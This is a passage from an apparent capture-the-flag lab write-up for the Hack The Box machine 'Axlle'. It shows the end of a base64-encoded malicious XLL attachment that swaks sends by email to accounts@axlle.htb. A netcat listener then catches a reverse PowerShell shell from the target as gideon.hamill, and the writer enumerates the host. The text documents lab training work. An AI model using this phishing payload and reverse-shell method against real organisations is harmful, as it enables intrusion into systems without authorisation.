-> UgVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIADwJHZXRDdXJyZW50UHJvY2VzcwBwBVRlcm1p
-> bmF0ZVByb2Nlc3MAAHADSXNQcm9jZXNzb3JGZWF0dXJlUHJlc2VudAAwBFF1ZXJ5UGVyZm9ybWFu
-> Y2VDb3VudGVyABACR2V0Q3VycmVudFByb2Nlc3NJZAAUAkdldEN1cnJlbnRUaHJlYWRJZAAA3QJH
-> ZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBUA0luaXRpYWxpemVTTGlzdEhlYWQAagNJc0RlYnVnZ2Vy
-> UHJlc2VudABLRVJORUwzMi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMqLfLZkrAADNXSDSZtT///////8A
-> AAAAAQAAAAIAAAAvIAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAANRAAAPAvAABQEAAAcRAAAPgv
-> AAB0EAAAxBAAAPAvAADEEAAA7xEAAPwvAADwEQAAchIAADAwAAB0EgAAaRMAAGwwAABsEwAAwBMA
-> AFgwAADAEwAA/RMAAJwwAAAAFAAANBQAAMAwAAA0FAAABRUAAKwwAAAIFQAAeRUAALQwAAB8FQAA
-> tRUAAPAvAAC4FQAA7BUAAPAvAADsFQAAARYAAPAvAAAEFgAALBYAAPAvAAAsFgAAQRYAAPAvAABE
-> FgAApRYAAFgwAACoFgAA2BYAAPAvAADYFgAA7BYAAPAvAADsFgAANRcAAMAwAAA4FwAAARgAAPAw
-> AAAEGAAAnRgAAMgwAACgGAAAxBgAAMAwAADEGAAA7xgAAMAwAADwGAAAPxkAAMAwAABAGQAAVxkA
-> APAvAABYGQAABBoAAPwwAAAwGgAASxoAAPAvAABUGgAAmRsAAAgxAACcGwAA5hsAAJwwAADoGwAA
-> MhwAAJwwAAA8HAAAAh4AABgxAACQHgAAkh4AADAxAACSHgAAqR4AACgwAACpHgAAxR4AACgwAADF
-> HgAA+x4AAJQwAAD7HgAAEx8AAOgwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYAAABHAAAASgAAAAsAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABgAAAAYAACA
-> AAAAAAAAAAAAAAAAAAABAAIAAAAwAACAAAAAAAAAAAAAAAAAAAABAAkEAABIAAAAYHAAAH0BAAAA
-> AAAAAAAAAAAAAAAAAAAAPD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnIHN0YW5k
-> YWxvbmU9J3llcyc/Pg0KPGFzc2VtYmx5IHhtbG5zPSd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29t
-> OmFzbS52MScgbWFuaWZlc3RWZXJzaW9uPScxLjAnPg0KICA8dHJ1c3RJbmZvIHhtbG5zPSJ1cm46
-> c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJl
-> cXVlc3RlZFByaXZpbGVnZXM+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZl
-> bD0nYXNJbnZva2VyJyB1aUFjY2Vzcz0nZmFsc2UnIC8+DQogICAgICA8L3JlcXVlc3RlZFByaXZp
-> bGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5Pg0KAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAGAAAAPigAKFYoWChyKzgrOisAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
->
-> ------=_MIME_BOUNDARY_000_1176320--
->
->
-> .
<- 250 Queued (10.375 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.Using swaks to deliver the XLL payload as an attachment to the contact, accounts@axlle.htb
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 61727
PS C:\> whoami
axlle\gideon.hamill
PS C:\> hostname
MAINFRAME
PS C:\> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::221
IPv6 Address. . . . . . . . . . . : dead:beef::ff27:2a17:3cd2:b528
Link-local IPv6 Address . . . . . : fe80::ff83:e019:f578:fe72%11
IPv4 Address. . . . . . . . . . . : 10.10.11.21
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
10.10.10.2Initial Foothold established to the target system as the gideon.hamill user via XLL phishing